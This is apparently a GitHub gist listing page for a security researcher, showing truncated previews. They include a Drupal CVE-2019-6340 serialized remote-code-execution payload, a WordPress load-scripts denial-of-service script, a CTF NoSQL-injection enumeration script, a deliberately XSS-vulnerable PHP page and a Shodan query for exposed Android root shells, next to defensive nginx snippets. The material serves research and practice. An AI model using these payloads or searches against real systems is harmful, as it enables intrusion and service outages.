theMiddle theMiddleBlue

@theMiddleBlue
theMiddleBlue / docker-compose.yml
Created December 24, 2020 08:49
CVE-2019-7609 PoC
version: '2.2'
services:
  es01:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.5.0
    container_name: elastic
    environment:
      - node.name=elastic
      - cluster.name=es-docker-cluster
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
@theMiddleBlue
theMiddleBlue / index.php
Created August 21, 2020 14:15
XSS Vulnerable Web Application
<html>
<body>
<?php
function sanitize_username($username) {
    return strtr(
        htmlentities($username, ENT_QUOTES),
        [';' => '']
    );
}
@theMiddleBlue
theMiddleBlue / drupal8rce.json
Created March 8, 2019 13:55
Drupal CVE-2019-6340
{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href": "http://localhost/rest/type/shortcut/default"
@theMiddleBlue
theMiddleBlue / tt.php
Created October 15, 2018 13:24
machinebox hp video rev3rse security
<?php
if(isset($_POST['photo'])) {
    // echo $_POST['photo'];
    file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));
    exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);
    echo(implode('', $a));
@theMiddleBlue
theMiddleBlue / DNSBL.conf
Last active November 4, 2023 23:35
Nginx Lua DNSBL
# Configuration
# --------------
# Comment the following line if you are not behind a proxy_pass or load balancer
set $dnsbl_clientip $remote_addr;
# Uncomment if the client IP is on X-Forwarded-For
#set $dnsbl_clientip $http_x_forwarded_for;
# Uncomment if you are using CloudFlare
@theMiddleBlue
theMiddleBlue / htb-node-enumerate.sh
Created March 4, 2018 10:35
HTB Node user enumeration via mongodb nosqli
#!/bin/bash
# Usage: ./htb-node-enumerate.sh r
chars='qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM$'
function getchar() {
for (( i=0; i<${#chars}; i++ )); do
if [ -z $2 ]; then
@theMiddleBlue
theMiddleBlue / dos.py
Created February 5, 2018 13:40
wordpress load-scripts dos
import requests, sys
payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-
@theMiddleBlue
theMiddleBlue / nginx.conf
Last active April 14, 2020 12:33
Nginx human user recognition
server {
    listen 80;
    server_name example.com;
    encrypted_session_key 'v1-clG~!~v7B_Z0yu.:iw*Rj#l-Nc8E^';
    encrypted_session_iv "themiddlerfvbgt5";
    encrypted_session_expires 20;
    location ~ /botbuster.js {
        default_type 'text/javascript';
@theMiddleBlue
theMiddleBlue / secthemall-tor.py
Last active January 29, 2021 13:39
Script for downloading the SECTHEMALL Tor Reputation IP list
#!/usr/bin/env python
# ---------------- CONFIG ------------------
username = "your@secthemall username here"
apikey = "your API Key here"
size = "1000"
sleep_sec = 60
nginx_reload_cmd = "service nginx reload"
@theMiddleBlue
theMiddleBlue / shodan.py
Created August 19, 2017 17:38
Shodan.io API
import httplib, urllib, re, sys, json, socket, struct
# python shodan.py 0
# ^ this is the page number
shodan = {
'apikey': '<your shodan API key>',
'query': r'"root%40"+"android"+port%3A23',
}